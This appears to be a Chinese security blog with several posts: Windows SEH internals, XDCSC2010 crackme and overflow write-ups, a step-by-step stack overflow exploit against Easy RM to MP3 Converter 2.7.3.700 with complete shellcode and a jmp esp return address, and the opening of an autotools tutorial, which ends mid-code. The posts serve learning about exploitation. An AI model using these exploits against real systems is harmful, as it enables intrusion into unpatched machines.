104:      {
105:          __try
004011DC   mov         dword ptr [ebp-4],1
106:          {
107:              __try
004011E3   mov         dword ptr [ebp-4],2
108:              {
109:                  i = i/0;
004011EA   mov         eax,dword ptr [ebp-1Ch]
004011ED   cdq
0

第5~10行是在登记异常处理器，与我们手工编写有所不同。

第一，使用__except_handler3作为异常处理函数。编译器编译__try{}__except{}结构时总是使用统一的函数将其登记为异常处理函数，并不是为每段使用SEH的代码生成单独处理函数。不同编译器使用的异常处理函数可能不同，这里使用的VC6编译器的__except_handler3。异常处理函数是由系统异常分发函数来调用的，即RtlDispatchException>ExecuteHandler>ExecuteHandler2>__except_handler3，而且这些参数的个数是固定的。这意味着要增加新的参数是不可行的，解决办法只能扩展现有参数，通过类型转换将简单的类型转变为包含扩展字段的复杂类型，这正是VC所采用的方案。就是下面的第二点差异。

第二，在栈上准备EXCEPTION_REGISTRATION_RECORD前（7~9行），编译器产生的代码会先压入一个被称为trylevel的整数（第5行）和一个指向scopetable_entry结构的scopetable指针（第6行），这样在栈上世纪形成了如下的_EXCEPTION_REGISTRATION结构。

struct _EXCEPTION_REGISTRATION{
	struct _EXCEPTION_REGISTRATION *prev;
	void (*handler)(PEXCEPTION_RECORD,PEXCEPTION_REGISTRATION,PCONTEXT,PEXCEPTION_RECORD);
	struct scopetable_entry *scopetable;
	int trylevel;
	int _ebp;
}

下面分别介绍几个字段的作用。

1.scopetable

这个指针指向一个数组，数组的每个元素是一个scopetable_entry结构，用来描述一个__try{}__except结构。

struct scopetable_entry
{
	DWORD	previousTryLevel;
	FARPROC	lpfnFilter;
	FARPROC	lpfnHandler;
}

其中lpfnFilter和lpfnHandler分别用来描述__try{}__except结构的过滤表达式和异常处理块的起始地址。还是以上面的例子看看

00422130  FF FF FF FF CC 12 40 00 D2 12 40 00 FF FF FF FF  ......@...@.....
00422140  FE 12 40 00 04 13 40 00

一个函数注册一个_EXCEPTION_REGISTRATION，每个try except对应scopetable中的一个元素。这个例子中，main函数中有2个try，所以有2个元素，第一个FFFFFFFF表示其不在任何__try结构中，004012CC是第一个__try的过滤函数，004012D2表示第一个__try的处理函数。

2.trylevel

trylevel表示的是scopetable对应的索引。在main最开始的时候是-1，表示不属于任何try结构，当进入第一个try结构中，设置这个变量为0（第23行），表示如果发生异常，就要去找scopetable中的第一个元素，离开第一个try之后，我们又将其设置为-1（第43行）。

为了对scopetable和trylevel，我们队Function1进行升入考察，其scopetable如下：

004220E0  FF FF FF FF 2F 12 40 00 32 12 40 00 00 00 00 00  ..../[email protected].@.....
004220F0  19 12 40 00 1C 12 40 00 01 00 00 00 03 12 40 00  ..@...@.......@.
00422100  06 12 40 00

这个scopetable共有3个元素，第一个的previousTrylevel为-1，说明其不再任何try块中，第二个元素的previousTrylevel为0，说明其在第0个scopetable元素的内部，第三个类似，我们从104~110行能够看到每次进入一个try块就会设置trylevel。

我们先看看__except_handler3的伪代码，然后再总结一下其运行过程：

int __except_handler3(
struct _EXCEPTION_RECORD * pExceptionRecord,
struct EXCEPTION_REGISTRATION * pRegistrationFrame,
struct _CONTEXT *pContextRecord,
void * pDispatcherContext ) 
{ 
	LONG filterFuncRet;
	LONG trylevel;
	EXCEPTION_POINTERS exceptPtrs;
	PSCOPETABLE pScopeTable; 
	CLD // 将方向标志复位（不测试任何条件！） 
		// 如果没有设置EXCEPTION_UNWINDING标志或EXCEPTION_EXIT_UNWIND标志
		// 表明这是第一次调用这个处理程序（也就是说，并非处于异常展开阶段）
		if ( ! (pExceptionRecord->ExceptionFlags
			& (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND)) )
		{
			// 在堆栈上创建一个EXCEPTION_POINTERS结构
			exceptPtrs.ExceptionRecord = pExceptionRecord;
			exceptPtrs.ContextRecord = pContextRecord; 
			// 把前面定义的EXCEPTION_POINTERS结构的地址放在比
			// establisher栈帧低4个字节的位置上。参考前面我讲
			// 的编译器为GetExceptionInformation生成的汇编代
			// 码*(PDWORD)((PBYTE)pRegistrationFrame - 4) = &exceptPtrs; 
			// 获取初始的“trylevel”值
			trylevel = pRegistrationFrame->trylevel; 
			// 获取指向scopetable数组的指针 
			scopeTable = pRegistrationFrame->scopetable; 

	search_for_handler:
			if ( pRegistrationFrame->trylevel != TRYLEVEL_NONE )
			{
				if ( pRegistrationFrame->scopetable[trylevel].lpfnFilter )
				{
					PUSH EBP // 保存这个栈帧指针 
						// ！！！非常重要！！！切换回原来的EBP。正是这个操作才使得
						// 栈帧上的所有局部变量能够在异常发生后仍然保持它的值不变。
						EBP = &pRegistrationFrame->_ebp; 
					// 调用过滤器函数
					filterFuncRet = scopetable[trylevel].lpfnFilter(); 
					POP EBP // 恢复异常处理程序的栈帧指针 
						if ( filterFuncRet != EXCEPTION_CONTINUE_SEARCH )
						{
							if ( filterFuncRet < 0 ) // EXCEPTION_CONTINUE_EXECUTION
								return ExceptionContinueExecution; 
							// 如果能够执行到这里，说明返回值为EXCEPTION_EXECUTE_HANDLER
							scopetable = pRegistrationFrame->scopetable; 
							// 让操作系统清理已经注册的栈帧，这会使本函数被递归调用
							__global_unwind2( pRegistrationFrame ); 
							// 一旦执行到这里，除最后一个栈帧外，所有的栈帧已经
							// 被清理完毕，流程要从最后一个栈帧继续执行
							EBP = &pRegistrationFrame->_ebp; 
							__local_unwind2( pRegistrationFrame, trylevel ); 
							// NLG = "non-local-goto" (setjmp/longjmp stuff)
							__NLG_Notify( 1 ); // EAX = scopetable->lpfnHandler 
							// 把当前的trylevel设置成当找到一个异常处理程序时
							// SCOPETABLE中当前正在被使用的那一个元素的内容
							pRegistrationFrame->trylevel = scopetable->previousTryLevel; 
							// 调用__except {}块，这个调用并不会返回
							pRegistrationFrame->scopetable[trylevel].lpfnHandler();
						} 
				} 
				scopeTable = pRegistrationFrame->scopetable;
				trylevel = scopeTable->previousTryLevel;
				goto search_for_handler; 
			}
			else // trylevel == TRYLEVEL_NONE
			{
				return ExceptionContinueSearch;
			} 
		}
		else // 设置了EXCEPTION_UNWINDING标志或EXCEPTION_EXIT_UNWIND标志
		{
			PUSH EBP // 保存EBP
				EBP = &pRegistrationFrame->_ebp; // 为调用__local_unwind2设置EBP
			__local_unwind2( pRegistrationFrame, TRYLEVEL_NONE )
				POP EBP // 恢复EBP
				return ExceptionContinueSearch;
		} 
}

__except_handler3函数执行的操作主要有：

1.将第二个参数pRegistrationRecord从系统默认的EXCEPTION_REGISTRATION_RECORD结构强制转化为包含扩展字段的_EXCEPTION_REGISTRATION结构。

2.先从pRegistrationRecord结构中取出trylevel字段的值并且赋给一个局部变量nTrylevel，然后根据nTrylevel的值从scopetable字段所指定的数组中找到一个scopetable_entry结构。

3.从scopetable_entry结构中取出lpfnFilter字段，如果不为空，则调用这个函数，即评估过滤表达式，如果为空，则跳到第五步。

4.如果lpfnFilter函数返回值不等于EXCEPTION_CONTINUE_SEARCH，则准备执行lpfnHandler字段做指定的函数，并且不再返回。如果过滤表达式返回的是EXCEPTION_CONTINUE_SEARCH，则自然进入（Fall Through)到第五步。

5.判断scopetable_entry结构的previousTrylevel字段值，如果它不等于-1，则将previousTrylevel赋给nTrylevel并返回到第二步继续循环。如果previousTrylevel等于-1，那么继续到第六步。

6.返回DISPOSITION_CONTINUE_SEARCH，让系统(RtlDispatchException)继续寻找其他异常处理器。

__except_handler3是如何做到既通过CALL指令调用__except块而又不让执行流程返回呢？由于CALL指令要向堆栈中压入了一个返回地址，你可以想象这有可能破坏堆栈。如果你检查一下编译器为__except块生成的代码，你会发现它做的第一件事就是将EXCEPTION_REGISTRATION结构下面8个字节处（即[EBP-18H]处）的一个DWORD值加载到ESP寄存器中（实际代码为MOV ESP,DWORD PTR [EBP-18H]）,这个值是在函数的 prolog 代码中被保存在这个位置的（实际代码为MOV DWORD PTR [EBP-18H],ESP）。

上述过程省略了全局展开和局部展开，我们在下一节专门讨论。

四. 展开

为了说明这个概念，需要先回顾下异常发生后的处理流程。

我们假设一系列使用 SEH 的函数调用流程： func1 -> func2 -> func3。在 func3 执行的过程中触发了异常。

看看分发异常流程 RtlRaiseException -> RtlDispatchException -> RtlpExecuteHandlerForException RtlDispatchException 会遍历异常链表，对每个 EXCEPTION_REGISTRATION 都调用 RtlpExecuteHandlerForException。 RtlpExecuteHandlerForException 会调用 EXCEPTION_REGISTRATION::handler，也就是 ——__except_handler3。如咱们上面分析，该函数内部遍历 EXCEPTION_REGISTRATION::scopetable，如果遇到有 scopetable_entry::lpfnFilter 返回 EXCEPTION_EXECUTE_HANDLER，那么 scopetable_entry::lpfnHandler 就会被调用，来处理该异常。因为 lpfnHandler 不会返回到__except_handler3，于是执行完 lpfnHandler 后，就会从 lpfnHandler 之后的代码继续执行下去。也就是说，假设 func3 中触发了一个异常，该异常被 func1 中的 __except 处理块处理了，那 __except 处理块执行完毕后，就从其后的指令继续执行下去，即异常处理完毕后，接着执行的就是 func1 的代码。不会再回到 func2 或者 func3，这样就有个问题，func2 和 func3 中占用的资源怎么办？这些资源比如申请的内存是不会自动释放的，岂不是会有资源泄漏问题？

这就需要用到“展开”了。说白了，所谓“展开”就是进行清理。（注：这里的清理主要包含动态分配的资源的清理，栈空间是由 func1 的“mov esp,ebp” 这类操作顺手清理的。当时我被“谁来清理栈空间”这个问题困扰了很久……）

那这个展开工作由谁来完成呢？由 func1 来完成肯定不合适，毕竟 func2 和 func3 有没有申请资源、申请了哪些资源，func1 无从得知。于是这个展开工作还得要交给 func2 和 func3 自己来完成。

展开分为两种：“全局展开”和“局部展开”。全局展开是指针对异常链表中的某一段，局部展开针对指定 EXCEPTION_REGISTRATION。用上面的例子来讲，局部展开就是针对 func3 或 func2 （某一个函数）内部进行清理，全局展开就是 func2 和 func3 的局部清理的总和。再归纳一下，局部展开是指具体某一函数内部的清理，而全局展开是指，从异常触发点（func3）到异常处理点（func1）之间所有函数（包含异常触发点 func3）的局部清理的总和。

使用RtlUnwind来进行展开。

  void _RtlUnwind( PEXCEPTION_REGISTRATION pRegistrationFrame,
		  PVOID returnAddr, // 并未使用！（至少是在i386机器上）
		  PEXCEPTION_RECORD pExcptRec,
		  DWORD _eax_value) 
  { 
	  DWORD stackUserBase;
	  DWORD stackUserTop;
	  PEXCEPTION_RECORD pExcptRec;
	  EXCEPTION_RECORD exceptRec;
	  CONTEXT context; 
	  // 从FS:[4]和FS:[8]处获取堆栈的界限
	  RtlpGetStackLimits( &stackUserBase, &stackUserTop ); 
	  if ( 0 == pExcptRec ) // 正常情况
	  {
		  pExcptRec = &excptRec;
		  pExcptRec->ExceptionFlags = 0;
		  pExcptRec->ExceptionCode = STATUS_UNWIND;
		  pExcptRec->ExceptionRecord = 0;
		  pExcptRec->ExceptionAddress = [ebp+4]; // RtlpGetReturnAddress()—获取返回地址
		  pExcptRec->ExceptionInformation[0] = 0;
	  } 
	  if ( pRegistrationFrame )
		  pExcptRec->ExceptionFlags |= EXCEPTION_UNWINDING;
	  else             // 这两个标志合起来被定义为EXCEPTION_UNWIND_CONTEXT
		  pExcptRec->ExceptionFlags|=(EXCEPTION_UNWINDING|EXCEPTION_EXIT_UNWIND); 
	  context.ContextFlags =( CONTEXT_i486 | CONTEXT_CONTROL |
		  CONTEXT_INTEGER | CONTEXT_SEGMENTS); 
	  RtlpCaptureContext( &context ); 
	  context.Esp += 0x10;
	  context.Eax = _eax_value; 
	  PEXCEPTION_REGISTRATION pExcptRegHead;
	  pExcptRegHead = RtlpGetRegistrationHead(); // 返回FS:[0]的值 
	  // 开始遍历EXCEPTION_REGISTRATION结构链表
	  while ( -1 != pExcptRegHead )
	  {
		  EXCEPTION_RECORD excptRec2; 
		  if ( pExcptRegHead == pRegistrationFrame )
		  {
			  NtContinue( &context, 0 );
		  }
		  else
		  {
			  // 如果存在某个异常帧在堆栈上的位置比异常链表的头部还低
			  // 说明一定出现了错误
			  if ( pRegistrationFrame && (pRegistrationFrame <= pExcptRegHead) )
			  {
				  // 生成一个异常
				  excptRec2.ExceptionRecord = pExcptRec;
				  excptRec2.NumberParameters = 0;
				  excptRec2.ExceptionCode = STATUS_INVALID_UNWIND_TARGET;
				  excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
				  RtlRaiseException( &exceptRec2 );
			  }
		  } 
		  PVOID pStack = pExcptRegHead + 8; // 8 = sizeof(EXCEPTION_REGISTRATION) 
		  // 确保pExcptRegHead在堆栈范围内，并且是4的倍数
		  if ( (stackUserBase <= pExcptRegHead )
			  && (stackUserTop >= pStack )
			  && (0 == (pExcptRegHead & 3)) )
		  {
			  DWORD pNewRegistHead;
			  DWORD retValue; 
			  retValue = RtlpExecutehandlerForUnwind(pExcptRec, pExcptRegHead, &context,
				  &pNewRegistHead, pExceptRegHead->handler ); 
			  if ( retValue != DISPOSITION_CONTINUE_SEARCH )
			  {
				  if ( retValue != DISPOSITION_COLLIDED_UNWIND )
				  {
					  excptRec2.ExceptionRecord = pExcptRec;
					  excptRec2.NumberParameters = 0;
					  excptRec2.ExceptionCode = STATUS_INVALID_DISPOSITION;
					  excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
					  RtlRaiseException( &excptRec2 );
				  }
				  else
					  pExcptRegHead = pNewRegistHead;
			  } 
			  PEXCEPTION_REGISTRATION pCurrExcptReg = pExcptRegHead;
			  pExcptRegHead = pExcptRegHead->prev;
			  RtlpUnlinkHandler( pCurrExcptReg ); 
		  }
		  else // 堆栈已经被破坏！生成一个异常
		  {
			  excptRec2.ExceptionRecord = pExcptRec;
			  excptRec2.NumberParameters = 0;
			  excptRec2.ExceptionCode = STATUS_BAD_STACK;
			  excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
			  RtlRaiseException( &excptRec2 );
		  } 
	  } 
	  // 如果执行到这里，说明已经到了EXCEPTION_REGISTRATION
	  // 结构链表的末尾，正常情况下不应该发生这种情况。
	  //（因为正常情况下异常应该被处理，这样就不会到链表末尾）
	  if ( -1 == pRegistrationFrame )
		  NtContinue( &context, 0 );
	  else
		  NtRaiseException( pExcptRec, &context, 0 ); 
  } 

  RtlUnwind函数的伪代码到这里就结束了，以下是它调用的几个函数的伪代码： 
	  PEXCEPTION_REGISTRATION RtlpGetRegistrationHead( void )
  {
	  return FS:[0];
  } 
  RtlpUnlinkHandler( PEXCEPTION_REGISTRATION pRegistrationFrame )
  {
	FS:[0] = pRegistrationFrame->prev;
  } 
  void RtlpCaptureContext( CONTEXT * pContext )
  {
	  pContext->Eax = 0;
	  pContext->Ecx = 0;
	  pContext->Edx = 0;
	  pContext->Ebx = 0;
	  pContext->Esi = 0;
	  pContext->Edi = 0;
	  pContext->SegCs = CS;
	  pContext->SegDs = DS;
	  pContext->SegEs = ES;
	  pContext->SegFs = FS;
	  pContext->SegGs = GS;
	  pContext->SegSs = SS;
	  pContext->EFlags = flags; // 它对应的汇编代码为__asm{ PUSHFD / pop [xxxxxxxx] }
	  pContext->Eip = 此函数的调用者的调用者的返回地址    // 读者看一下这个函数的
		  pContext->Ebp = 此函数的调用者的调用者的EBP        // 汇编代码就会清楚这一点
		  pContext->Esp = pContext->Ebp + 8;
  }

虽然 RtlUnwind 函数的规模看起来很大，但是如果你按一定方法把它分开，其实并不难理解。它首先从FS:[4]和FS:[8]处获取当前线程堆栈的界限。它们对于后面要进行的合法性检查非常重要，以确保所有将要被展开的异常帧都在堆栈范围内。

RtlUnwind 接着在堆栈上创建了一个空的EXCEPTION_RECORD结构并把STATUS_UNWIND赋给它的ExceptionCode域，同时把 EXCEPTION_UNWINDING标志赋给它的 ExceptionFlags 域。指向这个结构的指针作为其中一个参数被传递给每个异常回调函数。然后，这个函数调用RtlCaptureContext函数来创建一个空的CONTEXT结构，这个结构也变成了在展开阶段调用每个异常回调函数时传递给它们的一个参数。

RtlUnwind函数的其余部分遍历EXCEPTION_REGISTRATION结构链表。对于其中的每个帧，它都调用 RtlpExecuteHandlerForUnwind 函数，正是这个函数带 EXCEPTION_UNWINDING 标志调用了异常处理回调函数。RtlpExecuteHandlerForException的代码与RtlpExecuteHandlerForUnwind的代码极其相似。这两个“函数”都只是简单地给EDX寄存器加载一个不同的值然后就调用ExecuteHandler函数。也就是说，RtlpExecuteHandlerForException和RtlpExecuteHandlerForUnwind都是 ExecuteHanlder这个公共函数的前端。

ExecuteHandler查找EXCEPTION_REGISTRATION结构的handler域的值并调用它。令人奇怪的是，对异常处理回调函数的调用本身也被一个结构化异常处理程序封装着。在SEH自身中使用SEH看起来有点奇怪，但你思索一会儿就会理解其中的含义。如果在异常回调过程中引发了另外一个异常，操作系统需要知道这个情况。根据异常发生在最初的回调阶段还是展开回调阶段，ExecuteHandler或者返回DISPOSITION_NESTED_EXCEPTION，或者返回DISPOSITION_COLLIDED_UNWIND。这两者都是“红色警报！现在把一切都关掉！”类型的代码。每次回调之后，它调用RtlpUnlinkHandler 移除相应的异常帧。

RtlUnwind 函数的第一个参数是一个帧的地址，当它遍历到这个帧时就停止展开异常帧。上面所说的这些代码之间还有一些安全性检查代码，它们用来确保不出问题。如果出现任何问题，RtlUnwind 就引发一个异常，指示出了什么问题，并且这个异常带有EXCEPTION_NONCONTINUABLE 标志。当一个进程被设置了这个标志时，它就不允许再运行，必须终止。

参考：

A Crash Course on the Depths of Win32™ Structured Exception Handling
SEH分析笔记（X86篇）
《软件调试》张银奎
ReactOS源码
wrk源码

XDCSC2010破解题2

2014-03-25T00:00:00+00:00

程序下载04破解丢到IDA里面一看，当场吓尿了，这么蛋疼的算过去算过来要分析到什么时候去。这个程序的流程就非常清楚的，就是输入一个参数，经过各种运算，最终得到的结果与

1011010011110110

相比，如果相同就Yes，否则Sorry。既然题目的readme说密码为三位数字，我直接将000——999枚举一遍就ok了。

import os
#f = open('ret.txt','w')
for i in range(10):
    for j in range(10):
        for k in range(10):
            param = str(i)+str(j)+str(k)
            ret = os.popen('1.exe ' + param)
            #f.write(param + ":" + ret.read())
            if(ret.read() == "Yes\n"):
                print 'The answer is :' + param
#f.close()

下面是python中的结果：

>>> 
The answer is :918
>>> 

再次运行原程序：

XDCSC2010破解题1

2014-03-17T00:00:00+00:00

这是一个破解题，程序下载03破解程序是要求输入正确的密码，感觉这种题应该不算太难。直接甩到IDA里面，F5（不要鄙视我老师F5，F5看大概，之后OD看细节），一看不打紧，结果发现流程清清楚楚，顿时喜上眉梢。

int __cdecl wmain()
{
  const char *v1; // [sp-4h] [bp-20Ch]@2
  char v2; // [sp+4h] [bp-204h]@1
  char Dst; // [sp+5h] [bp-203h]@1
  unsigned int v4; // [sp+204h] [bp-4h]@1
  int v5; // [sp+208h] [bp+0h]@1

  v4 = (unsigned int)&v5 ^ __security_cookie;
  printf(&Format);
  v2 = 0;
  memset(&Dst, 0, 0x1FFu);
  scanf(&byte_402108, &v2);
  if ( strcmp(&v2, (const char *)&unk_40210C) )
    v1 = &byte_402130;
  else
    v1 = (const char *)&unk_402114;
  printf(v1);
  return 0;
}

这就是直接将输入字符串对比就行了啊。然后一看40210C的字符窜，傻了眼有个0x1F，这在键盘上是没有对应的啊，肿么输入啊。这个时候我想到了以前一个同学问的同样的在cmd里面输入键盘上没有对应字符的问题。当时隐约记得可以通过管道，但是解这个题的时候没有想到。后来问了下吴哥，他一说重定向我马上就明白了。靠，这都忘了。

我们看到对应的密码是如图：

然后我就老老实实构造了一个二进制文件data，内容如下

1F 65 63 6D 32 30 34 00

cmd执行

软件破解1.exe < data

结果显示密码错误。这里面其实设计到scanf函数的一个特点。我们一般用scanf的时候都是

scanf("%s",a)
scanf("%d",&d)

这种格式，其实scanf还有这种格式scanf(“This is test%s”,a),这个时候我们输入的时候就必须要输入前面的非格式控制字符”This is test”然后才能输入%s对应的字符串，并且a缓冲区只存放%s部分。这个程序里面是将密码与缓冲区一一比较。我们的data中1F作为对应的非控制字符，为了跟密码一样，我们还得输入一个1f，也就是data的内容应该是：

1F 1F 65 63 6D 32 30 34 00

换成这个data，再执行

软件破解1.exe < data

就成功了。

一道XDCSC2010溢出题

2014-03-17T00:00:00+00:00

昨天偶然上了一下xdsec.org，发现上面放了往年的比赛题目，抱着试一试的心态下了xdcsc2010的题目来看看，这是第一个题的笔记。

这是一个溢出题，程序下载ExploitMe，题目要求如下：

抄起IDA，找到关键函数，F5一把，下面是大概的流程

signed int __cdecl sub_401000()
{
  HANDLE v0; // eax@1
  void *v1; // edi@1
  void *v2; // ebp@1
  HANDLE v3; // eax@1
  void *v4; // esi@1
  unsigned int v5; // ebx@2
  HMODULE v6; // esi@3
  signed int v8; // [sp+10h] [bp-318h]@1
  void *hHeap; // [sp+14h] [bp-314h]@1
  HANDLE v10; // [sp+18h] [bp-310h]@1
  DWORD NumberOfBytesRead; // [sp+1Ch] [bp-30Ch]@1
  int (**v12)(); // [sp+20h] [bp-308h]@1
  char v13; // [sp+24h] [bp-304h]@4
  int v14; // [sp+A4h] [bp-284h]@1
  char v15; // [sp+A8h] [bp-280h]@6
  char Buffer; // [sp+128h] [bp-200h]@3

  v8 = 0;
  v12 = &off_4050B4;
  v14 = (int)off_4050B0;
  NumberOfBytesRead = 0;
  v0 = HeapCreate(0, 0x1000u, 0x10000u);
  v1 = v0;
  hHeap = v0;
  v2 = HeapAlloc(v0, 0, 0x200u);
  v3 = CreateFileA("exploit.dat", 0x80000000u, 1u, 0, 4u, 0x80u, 0);
  v4 = v3;
  v10 = v3;
  if ( v3 != (HANDLE)-1 )
  {
    v5 = GetFileSize(v3, 0);
    if ( v5 <= 0x200 )
    {
      ReadFile(v4, &Buffer, v5, &NumberOfBytesRead, 0);
      memcpy(v2, &Buffer, v5);
      memset(&Buffer, 0, 0x200u);
      v6 = LoadLibraryA("user32.dll");
      dword_408510 = (int)GetProcAddress(v6, "MessageBoxW");
      dword_408514 = (int)GetProcAddress(v6, "MessageBoxA");
      if ( v5 <= 0x84 )
        memcpy(&v13, v2, v5);
      HeapFree(hHeap, 1u, v2);
      memset(v2, 0, 0x80u);
      if ( v5 <= 0x84 )
        memcpy(&v15, v2, v5);
      ((void (__thiscall *)(int (***)()))*v12)(&v12);
      (*(void (__thiscall **)(int *))v14)(&v14);
      v1 = hHeap;
      v4 = v10;
      v8 = 1;
    }
  }
  if ( v4 )
    CloseHandle(v4);
  if ( v2 )
    HeapFree(v1, 1u, v2);
  if ( v1 )
    HeapDestroy(v1);
  return v8;
}

程序流程还是比较明了的，先读取exploit.dat里面的数据到stack上面，接着拷到heap，再倒腾回stack，真实蛋疼，之前就受这个影响考虑多了，以为要涉及堆溢出等。主要是要注意到函数末尾的两个call，v12和v14，经过调试可以发现v14里面的数据是我们可以控制的。这里我就犯了一个错误，导致浪费了大量时间。我当时注意到函数中已经得到了MessageBoxA的地址（dword_408514），我就想直接跳过去，但是由于esp在低地址，参数老是构造不好，因为esp那块数据没有办法覆盖。

今天上午才突然开了窍，既然eip都控制了，还有啥干不了的，直接将eip定位到stack上我们能够覆盖到的数据，然后写几句压栈的shellcode，之后跳转到MessageBoxA里面去。最终的exploit.dat如下

00000000h: 7C FC 12 00 51 6A 00 68 C8 FC 12 00 68 D8 FC 12 ; |?.Qj.h赛..h攸.
00000010h: 00 6A 00 B9 14 85 40 00 FF 11 59 C3 00 00 00 00 ; .j.?匑..Y?...
00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000050h: 45 78 70 6C 6F 69 74 4D 65 00 00 00 00 00 00 00 ; ExploitMe.......
00000060h: 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73 00 ; Exploit success.
00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000080h: 78 FC 12 00                                     ; x?.

溢出结果

exploit编写笔记1——基于栈的溢出

2014-03-16T00:00:00+00:00

很早以前对漏洞利用这一块就有所了解，当时觉得这些都是一些小tricky，玩的都是一些故意的玩具漏洞，这段时间准备重新拾起来，开始按照教材corelan上面的教材一个一个对着实际的漏洞写exploit。这是第一篇，古老的buffer overflow。因为之前都是OD or windbg，现在要练习一下Immunity Debugger。所以这篇都是用的Immunity。

目标软件

Easy RM to MP3 Converter（版本2.7.3.700）

工具

Immunity Debugger

漏洞描述

通过创建一个恶意的.m3u文件将触发Easy RM to MP3 Converter (version 2.7.3.700)缓冲区溢出利用。

测试平台

 Microsoft Windows XP Professional 5.1.2600 Service Pack 3 Build 2600

下面是详细的exploit步骤

1. 漏洞触发

我们首先构造一个30000个字符的.m3u文件，前面25000全为’A’，后5000个为’B’。下面是构造的脚本

	filename = "crash.m3u"
	f = open(filename,'w')
	data = 'A' * 25000 + 'B' * 5000
	f.write(data)
	f.close()

使用Easy RM to MP3 Converter加载这个crash.m3u文件，可以看到发生错误，查看详细信息，如图。

从图可以看到，溢出之后的返回地址是0x42424242，也就是’BBBB’，这说明要覆盖的EIP在25000到30000之间。下面使用Immunity的查件mona来进行精确定位。

2. EIP定位

使用Immunity Debugger加载Easy RM to MP3 Converter,Run起来，加载crash.m3u。遇到异常之后Immunity接手。

首先设置mona的工作目录：

!mona config -set workingfolder c:\mona\%p

创建包含5000个字符的pattern：

!mona pattern_create 5000

此时pattern文件在C:\mona\RM2MP3Converter\pattern.txt，将pattern中的5000个字符替换crash.m3u中最后5000个字符。脚本如下：

	filename = "crash_pattern.m3u"
	f = open(filename,'w')
	data = 'A' * 25000
	
	fp = open("pattern.txt",'r')
	data += fp.read()
	f.write(data)
	f.close()

pattern.txt是删除了mona生成的一些信息之后的纯5000个字符文件。再次打开目标软件加载crash_pattern.m3u，看到崩溃之后的EIP如下图所示：

在command中输入

!mona pattern_offset 366a4235

我们看到EIP被修改的位置是25000 + 1067。

此时我们再用如下脚本测试一下位置是否正确：

	filename = "crash.m3u"
	f = open(filename,'w')
	data = 'A' * 26067 + 'B' * 4 + 'C'*100
	f.write(data)
	f.close()

我们可以看到，EIP现在是4个B，偏移正确，下面就是如何修改这个EIP

3. 寻找shellcode存放的地址空间

再次使用上面.m3u文件，崩溃时，打开栈的窗口

我们看到在ESP此时为000FF730，EIP到这里还有3*4=12个字节。ESP开始用于存放shellcode。

4. 查找jmp esp地址

再次加载目标程序，Run之后Pause，在CPU窗口，右键 Search For ->All commands in All modules，在之后的窗口输入jmp esp。

我们选一个7C874413。

5. 构造最终的输入文件

	shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
	    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
	    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
	    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
	    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
	    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
	    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
	    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
	    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
	    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
	    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
	    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
	    "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
	    "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
	    "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
	    "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
	    "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
	    "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
	    "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
	    "\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
	    "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
	    "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
	    "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
	    "\x40\xFF\x54\x24\x40\x57\xFF\xD0");
	
	ret = "\x13\x44\x87\x7c";
	filename = "crash.m3u"
	f = open(filename,'w')
	data = 'A' * 26067 + ret + '\x90' * 12 + shellcode
	f.write(data)
	f.close()

我们看到，成功利用了这个漏洞。

autotool工具简介

2014-01-15T00:00:00+00:00

开源软件的安装一般都分三步，

./configure
make
make install

本文以一个例子来简单说明一下如何使用autotool工具来简化程序的编译安装。执行./configure时，检查编译该程序所需要的条件是否存在，并且将(*.in)文件转化为最终文件(Makefile,config.h…）。当./configure成功后，就生成Makefile了。执行make之后，程序进行编译，之后使用make install进行安装。关于autotool的理论就不赘述了，网上随处都能找到，我只是简单记录一下过程。整个软件的发布如图所示：

我们来创建一个最简单的helloworld工程，目录结构如下。

	helloworld
	|
	|--include
	|  --hello.hxx world.hxx
	|
	|--lib
	| |--hello.cxx world.cxx
	|  --Makefile.am
	|
	|--src
	| |--main.cxx
	|  --Makefile.am
	|
	|--Makefile.am
	|--README, NEWS, ChangeLog, AUTHORS

我们先创建如上所示的目录结构，使用脚本如下：

 mkdir helloworld
 cd helloworld
 mkdir include
 cd include
 touch hello.hxx world.hxx 
 cd ..
 mkdir lib
 cd lib
 touch hello.cxx world.cxx Makefile.am
 cd ..
 mkdir src
 cd src
 touch main.cxx Makefile.am
 cd ..
 touch NEWS README ChangeLog AUTHORS Makefile.am

各个文件如下内容：

 //main.cxx
	
 #include "hello.hxx"
 #include "world.hxx"
 #include "config.h" // make configure results available
 int main()
 {
     hello first_word;
     world second_word;
